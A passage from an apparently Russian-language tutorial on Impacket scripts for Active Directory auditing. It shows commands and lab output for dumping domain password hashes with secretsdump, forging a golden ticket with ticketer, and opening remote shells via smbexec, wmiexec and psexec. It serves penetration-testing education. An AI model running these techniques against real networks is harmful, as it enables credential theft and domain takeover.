of the domain controller. If ommited it use the domain part (FQDN) specified in the target parameter   -target-ip ip address                         IP Address of the target machine. If ommited it will use whatever was specified as target. 
This is useful when target is the NetBIOS name and you cannot                         resolve it   -port [destination port]                         Destination port to connect to SMB Server  authentication:   -hashes LMHASH:NTHASH                         NTLM hashes, format is LMHASH:NTHASH   -no-pass              don't ask for password (useful for -k)   -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use                         the ones specified in the command line   -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256 bits)<\/code><\/pre>\n<\/div><\/div>\n<p>  <\/p>\n<h3><font color=\"#3AC1EF\">\u258d secretsdump<\/font><\/h3>\n<p>  \u041f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0445\u0435\u0448\u0438 \u043f\u0430\u0440\u043e\u043b\u0435\u0439 \u0443\u0447\u0451\u0442\u043d\u044b\u0445 \u0437\u0430\u043f\u0438\u0441\u0435\u0439 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u0433\u043e \u0441\u0435\u0440\u0432\u0435\u0440\u0430, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043c\u043e\u0433\u0443\u0442 \u0431\u044b\u0442\u044c \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u044b \u043d\u0430 \u0432\u043e\u0441\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u043f\u043e \u0441\u043b\u043e\u0432\u0430\u0440\u044e \u0438\u043b\u0438 \u0432 \u0430\u0442\u0430\u043a\u0430\u0445 <b><font color=\"#3AC1EF\"><a href=\"https:\/\/ru.wikipedia.org\/wiki\/%D0%90%D1%82%D0%B0%D0%BA%D0%B0_Pass-the-hash\">Pass-the-hash<\/a><\/font><\/b> \u0432 \u0441\u0432\u043e\u0451\u043c \u043f\u0435\u0440\u0432\u043e\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e\u043c \u0432\u0438\u0434\u0435:<\/p>\n<pre><code class=\"bash\">python3 secretsdump.py admin:password@192.168.1.13  [*] Service RemoteRegistry is in stopped state [*] Starting service RemoteRegistry [*] Target system bootKey: 0xafb23...1b9 [*] Dumping 
local SAM hashes (uid:rid:lmhash:nthash) \u0410\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440:500:aad....5b51404ee:ee24c810d...3b14b3f::: \u0413\u043e\u0441\u0442\u044c:501:aad3b435...1404ee:31d6cfe...e0c089c0::: DefaultAccount:503:aad3...51404ee:31d6cf...c089c0::: [-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information. [*] Dumping cached domain logon information (domain\/username:hash) [*] Dumping LSA Secrets [*] $MACHINE.ACC AD\\WIN-LIELOSOD7LK$:aes256-cts-hmac-sha1-96:a5fc6f195...427414a7a AD\\WIN-LIELOSOD7LK$:aes128-cts-hmac-sha1-96:38b3187...694eb2e98 AD\\WIN-LIELOSOD7LK$:des-cbc-md5:5bf16b...2f1 AD\\WIN-LIELOSOD7LK$:plain_password_hex:db8e2a...03831c0 AD\\WIN-LIELOSOD7LK$:aad3b435...37d846be8::: [*] DPAPI_SYSTEM dpapi_machinekey:0x1165a8d...c28c8e5fa dpapi_userkey:0xb7a4fea5f...83745a [*] NL$KM  0000   49 66 CC 64 01 42 79 3B  7F CA CB F6 04 E7 AD 22   If.d.By;.......\"  0030   47 DD BD EB CB 26 AC 4E  69 17 13 25 EE 37 0D 41   G....&amp;.Ni..%.7.A NL$KM:4966cc640142...25ee370d41 [*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets \u0410\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440:500:aad...04ee:ee24c81...4b3f::: \u0413\u043e\u0441\u0442\u044c:501:aad3b435b...404ee:31d6...89c0::: krbtgt:502:aad...04ee:1596e...34c8::: ad.ruvds.ru\\Ruvds:1107:aad3b4...ee:ee24...14b3f::: ad.ruvds.ru\\test:1112:aad...4ee:ee24c...3f::: ad.ruvds.ru\\admin:1114:aad3...4ee:ee24c8...3f::: WIN-LIELOSOD7LK$:1003:aad3...4ee:04f9...be8::: RUVDSMASTER$:1106:aad3...4ee:b2438...c725::: RUVDS-PC$:1108:aad3b...4ee:a03f...99::: RBCDmachine$:1111:aad...ee:7b592...87::: [*] Kerberos keys grabbed \u0410\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440:aes256-cts-hmac-sha1-96:939a4fd...2fb \u0410\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440:aes128-cts-hmac-sha1-96:71ea...0b6e507 
\u0410\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440:des-cbc-md5:a151...4f krbtgt:aes256-cts-hmac-sha1-96:890c7d940...75cad82 krbtgt:aes128-cts-hmac-sha1-96:9ed...15 krbtgt:des-cbc-md5:da08...8a54 ad.ruvds.ru\\Ruvds:aes256-cts-hmac-sha1-96:3805dfb...2ef7e ad.ruvds.ru\\Ruvds:aes128-cts-hmac-sha1-96:35e...42f ad.ruvds.ru\\Ruvds:des-cbc-md5:921...576 ad.ruvds.ru\\test:aes256-cts-hmac-sha1-96:6bb...8c5 ad.ruvds.ru\\test:aes128-cts-hmac-sha1-96:860...f5af ad.ruvds.ru\\test:des-cbc-md5:bfabe...f40da ad.ruvds.ru\\admin:aes256-cts-hmac-sha1-96:df00...64e0 ad.ruvds.ru\\admin:aes128-cts-hmac-sha1-96:678...b091 ad.ruvds.ru\\admin:des-cbc-md5:523b...b WIN-LIELOSOD7LK$:aes256-cts-hmac-sha1-96:a5fc6...a7a WIN-LIELOSOD7LK$:aes128-cts-hmac-sha1-96:38b318...e98 WIN-LIELOSOD7LK$:des-cbc-md5:5bf16...f1 RUVDSMASTER$:aes256-cts-hmac-sha1-96:e0b50bf...009b RUVDSMASTER$:aes128-cts-hmac-sha1-96:a300...34fb43 RUVDSMASTER$:des-cbc-md5:bafd...98ce RUVDS-PC$:aes256-cts-hmac-sha1-96:f3d8297527e...5c00c RUVDS-PC$:aes128-cts-hmac-sha1-96:c4c3ee...989c RUVDS-PC$:des-cbc-md5:94c1cb2...7c RBCDmachine$:aes256-cts-hmac-sha1-96:6a8c9058f0...399 RBCDmachine$:aes128-cts-hmac-sha1-96:7fdd...64f RBCDmachine$:des-cbc-md5:d3f7...110 <\/code><\/pre>\n<p>  <\/p>\n<div class=\"spoiler\" role=\"button\" tabindex=\"0\">                         <b class=\"spoiler_title\">\u0421\u0438\u043d\u0442\u0430\u043a\u0441\u0438\u0441:<\/b>                         <\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"bash\">usage: secretsdump.py [-h] [-ts] [-debug] [-system SYSTEM] [-bootkey BOOTKEY]                       [-security SECURITY] [-sam SAM] [-ntds NTDS]                       [-resumefile RESUMEFILE] [-outputfile OUTPUTFILE]                       [-use-vss] [-rodcNo RODCNO] [-rodcKey RODCKEY]                       [-use-keylist]                       [-exec-method [{smbexec,wmiexec,mmcexec}]]                       [-just-dc-user USERNAME] [-just-dc] [-just-dc-ntlm]                    
   [-pwd-last-set] [-user-status] [-history]                       [-hashes LMHASH:NTHASH] [-no-pass] [-k]                       [-aesKey hex key] [-keytab KEYTAB] [-dc-ip ip address]                       [-target-ip ip address]                       target   positional arguments:   target                [[domain\/]username[:password]@]&lt;targetName or address>                         or LOCAL (if you want to parse local files)  optional arguments:   -h, --help            show this help message and exit   -ts                   Adds timestamp to every logging output   -debug                Turn DEBUG output ON   -system SYSTEM        SYSTEM hive to parse   -bootkey BOOTKEY      bootkey for SYSTEM hive   -security SECURITY    SECURITY hive to parse   -sam SAM              SAM hive to parse   -ntds NTDS            NTDS.DIT file to parse   -resumefile RESUMEFILE                         resume file name to resume NTDS.DIT session dump (only                         available to DRSUAPI approach). This file will also be                         used to keep updating the session's state   -outputfile OUTPUTFILE                         base output filename. Extensions will be added for                         sam, secrets, cached and ntds   -use-vss              Use the VSS method instead of default DRSUAPI   -rodcNo RODCNO        Number of the RODC krbtgt account (only avaiable for                         Kerb-Key-List approach)   -rodcKey RODCKEY      AES key of the Read Only Domain Controller (only                         avaiable for Kerb-Key-List approach)   -use-keylist          Use the Kerb-Key-List method instead of default                         DRSUAPI   -exec-method [{smbexec,wmiexec,mmcexec}]                         Remote exec method to use at target (only when using                         -use-vss). Default: smbexec  display options:   -just-dc-user USERNAME                         Extract only NTDS.DIT data for the user specified.                         
Only available for DRSUAPI approach. Implies also                         -just-dc switch   -just-dc              Extract only NTDS.DIT data (NTLM hashes and Kerberos                         keys)   -just-dc-ntlm         Extract only NTDS.DIT data (NTLM hashes only)   -pwd-last-set         Shows pwdLastSet attribute for each NTDS.DIT account.                         Doesn't apply to -outputfile data   -user-status          Display whether or not the user is disabled   -history              Dump password history, and LSA secrets OldVal  authentication:   -hashes LMHASH:NTHASH                         NTLM hashes, format is LMHASH:NTHASH   -no-pass              don't ask for password (useful for -k)   -k                    Use Kerberos authentication. Grabs credentials from                         ccache file (KRB5CCNAME) based on target parameters.                         If valid credentials cannot be found, it will use the                         ones specified in the command line   -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256                         bits)   -keytab KEYTAB        Read keys for SPN from keytab file  connection:   -dc-ip ip address     IP Address of the domain controller. If ommited it use                         the domain part (FQDN) specified in the target                         parameter   -target-ip ip address                         IP Address of the target machine. If omitted it will                         use whatever was specified as target. This is useful                         when target is the NetBIOS name and you cannot resolve                         it<\/code><\/pre>\n<\/div><\/div>\n<p>  <\/p>\n<h3><font color=\"#3AC1EF\">\u258d smbclient<\/font><\/h3>\n<p>  SMB \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432 \u0434\u043b\u044f Linux \u0445\u0432\u0430\u0442\u0430\u0435\u0442. 
Impacket \u0438\u043c\u0435\u0435\u0442 \u0441\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u0443\u044e Python-\u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044e, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u0438 \u0432 \u0441\u0432\u043e\u0438\u0445 pet-\u043f\u0440\u043e\u0435\u043a\u0442\u0430\u0445:<\/p>\n<pre><code class=\"bash\">smbclient.py -no-pass -k -dc-ip 192.168.1.13 vpn.ad.ruvds.ru <\/code><\/pre>\n<p>  <\/p>\n<div class=\"spoiler\" role=\"button\" tabindex=\"0\">                         <b class=\"spoiler_title\">\u0421\u0438\u043d\u0442\u0430\u043a\u0441\u0438\u0441:<\/b>                         <\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"bash\">usage: smbclient.py [-h] [-file FILE] [-debug] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address] [-target-ip ip address] [-port [destination port]]                     target   positional arguments:   target                [[domain\/]username[:password]@]&lt;targetName or address>  optional arguments:   -h, --help            show this help message and exit   -file FILE            input file with commands to execute in the mini shell   -debug                Turn DEBUG output ON  authentication:   -hashes LMHASH:NTHASH                         NTLM hashes, format is LMHASH:NTHASH   -no-pass              don't ask for password (useful for -k)   -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use                         the ones specified in the command line   -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256 bits)  connection:   -dc-ip ip address     IP Address of the domain controller. 
If omitted it will use the domain part (FQDN) specified in the target parameter   -target-ip ip address                         IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name and you cannot                         resolve it   -port [destination port]                         Destination port to connect to SMB Server<\/code><\/pre>\n<\/div><\/div>\n<p>  <\/p>\n<h3><font color=\"#3AC1EF\">\u258d smbexec<\/font><\/h3>\n<p>  \u0428\u0435\u043b\u043b \u043d\u0430 \u043e\u0441\u043d\u043e\u0432\u0435 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0430 SMB:<\/p>\n<pre><code class=\"bash\">smbexec.py ad.ruvds.ru\/admin:password@WIN-LIELOSOD7LK.ad.ruvds.ru  nt authority\\\u0441\u0438\u0441\u0442\u0435\u043c\u0430 <\/code><\/pre>\n<p>  <\/p>\n<div class=\"spoiler\" role=\"button\" tabindex=\"0\">                         <b class=\"spoiler_title\">\u0421\u0438\u043d\u0442\u0430\u043a\u0441\u0438\u0441:<\/b>                         <\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"bash\">usage: smbexec.py [-h] [-share SHARE] [-mode {SERVER,SHARE}] [-ts] [-debug] [-codec CODEC] [-shell-type {cmd,powershell}] [-dc-ip ip address] [-target-ip ip address]                   [-port [destination port]] [-service-name service_name] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-keytab KEYTAB]                   target  positional arguments:   target                [[domain\/]username[:password]@]&lt;targetName or address>  optional arguments:   -h, --help            show this help message and exit   -share SHARE          share where the output will be grabbed from (default C$)   -mode {SERVER,SHARE}  mode to use (default SHARE, SERVER needs root!)   -ts                   adds timestamp to every logging output   -debug                Turn DEBUG output ON   -codec CODEC          Sets encoding used (codec) from the target's output (default \"utf-8\"). 
If errors are detected, run chcp.com at the target, map the result with                         https:\/\/docs.python.org\/3\/library\/codecs.html#standard-encodings and then execute smbexec.py again with -codec and the corresponding codec   -shell-type {cmd,powershell}                         choose a command processor for the semi-interactive shell  connection:   -dc-ip ip address     IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter   -target-ip ip address                         IP Address of the target machine. If ommited it will use whatever was specified as target. This is useful when target is the NetBIOS name and you cannot                         resolve it   -port [destination port]                         Destination port to connect to SMB Server   -service-name service_name                         The name of theservice used to trigger the payload  authentication:   -hashes LMHASH:NTHASH                         NTLM hashes, format is LMHASH:NTHASH   -no-pass              don't ask for password (useful for -k)   -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. 
If valid credentials cannot be found, it will use                         the ones specified in the command line   -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256 bits)   -keytab KEYTAB        Read keys for SPN from keytab file<\/code><\/pre>\n<\/div><\/div>\n<p>  <\/p>\n<h3><font color=\"#3AC1EF\">\u258d ticketConverter<\/font><\/h3>\n<p>  \u041a\u043e\u043d\u0432\u0435\u0440\u0442\u043e\u0440 \u0444\u043e\u0440\u043c\u0430\u0442\u0430 \u0431\u0438\u043b\u0435\u0442\u043e\u0432 \u043c\u0435\u0436\u0434\u0443 \u0440\u0430\u0437\u043d\u044b\u043c\u0438 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u0438\u044f\u043c\u0438 \u0432 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445 Linux \u0438 Windows. \u0412\u044b\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u043c \u0431\u0438\u043b\u0435\u0442:<\/p>\n<pre><code class=\"bash\">python3 ticketer.py -nthash 1596ef...c8 -domain-sid S-1-5-21-1377681614-1103095939-2089592296 -domain ad.ruvds.ru raj <\/code><\/pre>\n<p>  \u0414\u043b\u044f \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0435\u043d\u0438\u044f \u0440\u0430\u0431\u043e\u0442\u044b \u0441 \u044d\u0442\u0438\u043c \u0431\u0438\u043b\u0435\u0442\u043e\u043c \u0438\u0437-\u043f\u043e\u0434 Linux \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u043a\u043e\u043d\u0432\u0435\u0440\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435:<\/p>\n<pre><code class=\"bash\">python3 ticketConverter.py raj.ccache ticket.kirbi  KRB5CCNAME=ticket.kirbi <\/code><\/pre>\n<p>  <\/p>\n<div class=\"spoiler\" role=\"button\" tabindex=\"0\">                         <b class=\"spoiler_title\">\u0421\u0438\u043d\u0442\u0430\u043a\u0441\u0438\u0441:<\/b>                         <\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"bash\">usage: ticketConverter.py [-h] input_file output_file   positional arguments:   input_file   File in kirbi (KRB-CRED) or 
ccache format   output_file  Output file  optional arguments:   -h, --help   show this help message and exit<\/code><\/pre>\n<\/div><\/div>\n<p>  <\/p>\n<h3><font color=\"#3AC1EF\">\u258d ticketer<\/font><\/h3>\n<p>  \u041f\u043e\u043b\u0443\u0447\u0438\u0442\u044c TGS \u0438\u043b\u0438 TGT (\u0441\u0435\u0440\u0435\u0431\u0440\u044f\u043d\u044b\u0435 \u0438\u043b\u0438 \u0437\u043e\u043b\u043e\u0442\u044b\u0435 \u0431\u0438\u043b\u0435\u0442\u044b \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0435\u043d\u043d\u043e). \u0422\u0430\u043a \u043c\u043e\u0436\u043d\u043e \u0432\u044b\u043f\u0438\u0441\u0430\u0442\u044c TGT \u0434\u043b\u044f \u0432\u044b\u0434\u0443\u043c\u0430\u043d\u043d\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f <i>raj<\/i>, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044f \u0445\u0435\u0448 \u0441\u043b\u0443\u0436\u0435\u0431\u043d\u043e\u0439 \u0443\u0447\u0451\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 <i>krbtgt<\/i>:<\/p>\n<pre><code class=\"bash\">python3 ticketer.py -nthash 1596ef...4c8 -domain-sid S-1-5-21-1377681614-1103095939-2089592296 -domain ad.ruvds.ru raj [*] Creating basic skeleton ticket and PAC Infos [*] Customizing ticket for ad.ruvds.ru\/raj [*]     PAC_LOGON_INFO [*]     PAC_CLIENT_INFO_TYPE [*]     EncTicketPart [*]     EncAsRepPart [*] Signing\/Encrypting final ticket [*]     PAC_SERVER_CHECKSUM [*]     PAC_PRIVSVR_CHECKSUM [*]     EncTicketPart [*]     EncASRepPart [*] Saving ticket in raj.ccache <\/code><\/pre>\n<p>  <\/p>\n<div class=\"spoiler\" role=\"button\" tabindex=\"0\">                         <b class=\"spoiler_title\">\u0421\u0438\u043d\u0442\u0430\u043a\u0441\u0438\u0441:<\/b>                         <\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"bash\">usage: ticketer.py [-h] [-spn SPN] [-request] -domain DOMAIN -domain-sid DOMAIN_SID [-aesKey hex key] [-nthash NTHASH] [-keytab KEYTAB] [-groups GROUPS] [-user-id USER_ID]                    [-extra-sid EXTRA_SID] [-duration DURATION] [-ts] [-debug] 
[-user USER] [-password PASSWORD] [-hashes LMHASH:NTHASH] [-dc-ip ip address]                    target   positional arguments:   target                username for the newly created ticket  optional arguments:   -h, --help            show this help message and exit   -spn SPN              SPN (service\/server) of the target service the silver ticket will be generated for. if omitted, golden ticket will be created   -request              Requests ticket to domain and clones it changing only the supplied information. It requires specifying -user   -domain DOMAIN        the fully qualified domain name (e.g. contoso.com)   -domain-sid DOMAIN_SID                         Domain SID of the target domain the ticker will be generated for   -aesKey hex key       AES key used for signing the ticket (128 or 256 bits)   -nthash NTHASH        NT hash used for signing the ticket   -keytab KEYTAB        Read keys for SPN from keytab file (silver ticket only)   -groups GROUPS        comma separated list of groups user will belong to (default = 513, 512, 520, 518, 519)   -user-id USER_ID      user id for the user the ticket will be created for (default = 500)   -extra-sid EXTRA_SID  Comma separated list of ExtraSids to be included inside the ticket's PAC   -duration DURATION    Amount of days till the ticket expires (default = 365*10)   -ts                   Adds timestamp to every logging output   -debug                Turn DEBUG output ON  authentication:   -user USER            domain\/username to be used if -request is chosen (it can be different from domain\/username   -password PASSWORD    password for domain\/username   -hashes LMHASH:NTHASH                         NTLM hashes, format is LMHASH:NTHASH   -dc-ip ip address     IP Address of the domain controller. 
If ommited it use the domain part (FQDN) specified in the target parameter  Examples:         .\/ticketer.py -nthash &lt;krbtgt\/service nthash> -domain-sid &lt;your domain SID> -domain &lt;your domain FQDN> baduser          will create and save a golden ticket for user 'baduser' that will be all encrypted\/signed used RC4.         If you specify -aesKey instead of -ntHash everything will be encrypted using AES128 or AES256         (depending on the key specified). No traffic is generated against the KDC. Ticket will be saved as         baduser.ccache.          .\/ticketer.py -nthash &lt;krbtgt\/service nthash> -aesKey &lt;krbtgt\/service AES> -domain-sid &lt;your domain SID> -domain &lt;your domain FQDN> -request -user &lt;a valid domain user> -password &lt;valid domain user's password> baduser          will first authenticate against the KDC (using -user\/-password) and get a TGT that will be used         as template for customization. Whatever encryption algorithms used on that ticket will be honored,         hence you might need to specify both -nthash and -aesKey data. Ticket will be generated for 'baduser'         and saved as baduser.ccache<\/code><\/pre>\n<\/div><\/div>\n<p>  <\/p>\n<h3><font color=\"#3AC1EF\">\u258d wmiexec<\/font><\/h3>\n<p>  \u0415\u0449\u0451 \u043e\u0434\u0438\u043d \u0448\u0435\u043b\u043b \u043d\u0430 \u043e\u0441\u043d\u043e\u0432\u0435 WMI (<a href=\"https:\/\/learn.microsoft.com\/en-us\/windows\/win32\/wmisdk\/wmi-start-page\">Windows Management Instrumentation<\/a>):<\/p>\n<pre><code class=\"bash\">python3 wmiexec.py -hashes :ee2...3f ad.ruvds.ru\/admin@192.168.1.13  [*] SMBv3.0 dialect used [!] Launching semi-interactive shell - Careful what you execute [!] 
Press help for extra shell commands C:\\> <\/code><\/pre>\n<p>  <\/p>\n<div class=\"spoiler\" role=\"button\" tabindex=\"0\">                         <b class=\"spoiler_title\">\u0421\u0438\u043d\u0442\u0430\u043a\u0441\u0438\u0441:<\/b>                         <\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"bash\">usage: wmiexec.py [-h] [-share SHARE] [-nooutput] [-ts] [-silentcommand] [-debug] [-codec CODEC] [-shell-type {cmd,powershell}] [-com-version MAJOR_VERSION:MINOR_VERSION]                   [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address] [-A authfile] [-keytab KEYTAB]                   target [command ...]   positional arguments:   target                [[domain\/]username[:password]@]&lt;targetName or address>   command               command to execute at the target. If empty it will launch a semi-interactive shell  optional arguments:   -h, --help            show this help message and exit   -share SHARE          share where the output will be grabbed from (default ADMIN$)   -nooutput             whether or not to print the output (no SMB connection created)   -ts                   Adds timestamp to every logging output   -silentcommand        does not execute cmd.exe to run given command (no output)   -debug                Turn DEBUG output ON   -codec CODEC          Sets encoding used (codec) from the target's output (default \"utf-8\"). If errors are detected, run chcp.com at the target, map the result with                         https:\/\/docs.python.org\/3\/library\/codecs.html#standard-encodings and then execute wmiexec.py again with -codec and the corresponding codec   -shell-type {cmd,powershell}                         choose a command processor for the semi-interactive shell   -com-version MAJOR_VERSION:MINOR_VERSION                         DCOM version, format is MAJOR_VERSION:MINOR_VERSION e.g. 
5.7  authentication:   -hashes LMHASH:NTHASH                         NTLM hashes, format is LMHASH:NTHASH   -no-pass              don't ask for password (useful for -k)   -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use                         the ones specified in the command line   -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256 bits)   -dc-ip ip address     IP Address of the domain controller. If ommited it use the domain part (FQDN) specified in the target parameter   -A authfile           smbclient\/mount.cifs-style authentication file. See smbclient man page's -A option.   -keytab KEYTAB        Read keys for SPN from keytab file<\/code><\/pre>\n<\/div><\/div>\n<p>  <\/p>\n<h3><font color=\"#3AC1EF\">\u258d psexec.py<\/font><\/h3>\n<p>  \u0418 \u0437\u0430\u043a\u043b\u044e\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0439 \u0448\u0435\u043b\u043b \u043d\u0430 \u043e\u0441\u043d\u043e\u0432\u0435 \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u043d\u043e\u0433\u043e \u043b\u0435\u0433\u0438\u0442\u0438\u043c\u043d\u043e\u0433\u043e \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430 <i>psexec<\/i>:<\/p>\n<pre><code class=\"bash\">psexec.py ad.ruvds.ru\/admin@WIN-LIELOSOD7LK.ad.ruvds.ru -k -no-pass  [*] Requesting shares on 192.168.1.13..... [*] Found writable share #Temp [*] Uploading file cKOWdoIN.exe [*] Opening SVCManager on 192.168.1.13..... [*] Creating service LIAB on 192.168.1.13..... [*] Starting service LIAB..... 
C:\\> <\/code><\/pre>\n<p>  <\/p>\n<div class=\"spoiler\" role=\"button\" tabindex=\"0\">                         <b class=\"spoiler_title\">\u0421\u0438\u043d\u0442\u0430\u043a\u0441\u0438\u0441:<\/b>                         <\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"bash\">usage: psexec.py [-h] [-c pathname] [-path PATH] [-file FILE] [-ts] [-debug] [-codec CODEC] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-keytab KEYTAB]                  [-dc-ip ip address] [-target-ip ip address] [-port [destination port]] [-service-name service_name] [-remote-binary-name remote_binary_name]                  target [command ...]   positional arguments:   target                [[domain\/]username[:password]@]&lt;targetName or address>   command               command (or arguments if -c is used) to execute at the target (w\/o path) - (default:cmd.exe)  optional arguments:   -h, --help            show this help message and exit   -c pathname           copy the filename for later execution, arguments are passed in the command option   -path PATH            path of the command to execute   -file FILE            alternative RemCom binary (be sure it doesn't require CRT)   -ts                   adds timestamp to every logging output   -debug                Turn DEBUG output ON   -codec CODEC          Sets encoding used (codec) from the target's output (default \"utf-8\"). If errors are detected, run chcp.com at the target, map the result with                         https:\/\/docs.python.org\/3\/library\/codecs.html#standard-encodings and then execute smbexec.py again with -codec and the corresponding codec  authentication:   -hashes LMHASH:NTHASH                         NTLM hashes, format is LMHASH:NTHASH   -no-pass              don't ask for password (useful for -k)   -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. 
If valid credentials cannot be found, it will use                         the ones specified in the command line   -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256 bits)   -keytab KEYTAB        Read keys for SPN from keytab file  connection:   -dc-ip ip address     IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter   -target-ip ip address                         IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name and you cannot                         resolve it   -port [destination port]                         Destination port to connect to SMB Server   -service-name service_name                         The name of the service used to trigger the payload   -remote-binary-name remote_binary_name                         This will be the name of the executable uploaded on the target<\/code><\/pre>\n<\/div><\/div>\n<p>  <\/p>\n<h2><font color=\"#3AC1EF\">3. \u0417\u0430\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u0435<\/font><\/h2>\n<p>  \u0412 \u0441\u0442\u0430\u0442\u044c\u0435 \u043d\u0430 \u043f\u0440\u0430\u043a\u0442\u0438\u043a\u0435 \u043f\u043e\u043a\u0430\u0437\u0430\u043d\u043e \u043f\u0440\u0438\u043c\u0435\u043d\u0435\u043d\u0438\u0435 22 \u0441\u043a\u0440\u0438\u043f\u0442\u043e\u0432 \u0438\u0437 \u0441\u043e\u0441\u0442\u0430\u0432\u0430 Impacket, \u043f\u0440\u0435\u0434\u043d\u0430\u0437\u043d\u0430\u0447\u0435\u043d\u043d\u044b\u0445 \u0434\u043b\u044f \u0430\u0443\u0434\u0438\u0442\u0430 Active Directory. 
\u041f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0439 \u0441\u043f\u0440\u0430\u0432\u043e\u0447\u043d\u044b\u0439 \u043c\u0430\u0442\u0435\u0440\u0438\u0430\u043b \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043f\u0440\u0438\u043a\u043e\u0441\u043d\u0443\u0442\u044c\u0441\u044f \u043a \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u0435\u0439\u0448\u0435\u043c\u0443 \u043d\u0430\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044e \u0432 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u2013 \u0440\u0430\u0431\u043e\u0442\u043e\u0439 \u0432 Windows-\u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0435, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044f \u0434\u043b\u044f \u044d\u0442\u043e\u0433\u043e \u043b\u044e\u0431\u043e\u0439 Linux-\u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432, \u0445\u043e\u0442\u044f \u044d\u0442\u043e \u0438 \u043d\u0435 \u043e\u0431\u044f\u0437\u0430\u0442\u0435\u043b\u044c\u043d\u043e, \u0432\u0435\u0434\u044c \u0438\u043d\u0442\u0435\u0440\u043f\u0440\u0435\u0442\u0430\u0442\u043e\u0440 Python \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d \u043d\u0435 \u0442\u043e\u043b\u044c\u043a\u043e \u0442\u0430\u043c. 
